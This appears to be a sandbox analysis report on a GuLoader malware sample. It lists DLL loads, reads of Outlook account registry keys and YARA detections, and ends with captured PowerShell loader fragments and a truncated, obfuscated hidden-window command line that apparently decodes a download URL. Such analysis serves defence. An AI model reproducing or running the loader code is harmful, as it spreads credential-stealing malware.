Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: rasadhlp.dll

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe
Source:	Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((badarrah $Repine $Radiologernes), (Klassekvotienterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Squamate = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mercerization)), $Tradeful).DefineDynamicModule($Caic, $false).DefineType($Brandishing, $Gundeck, [System.MulticastDelegate])$Dissoul.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tvetunget $Sagsomkostninger $Regeringernes), (Komponentplaceringstegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:udgangsforbud = [AppDomain]::Curre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tallote)), $Nektarin199).DefineDynamicModule($Unoriginal, $false).DefineType($Rhabdom, $Vedhftendes, [System.MulticastDelegate])$Debar
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe

Obfuscated command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg 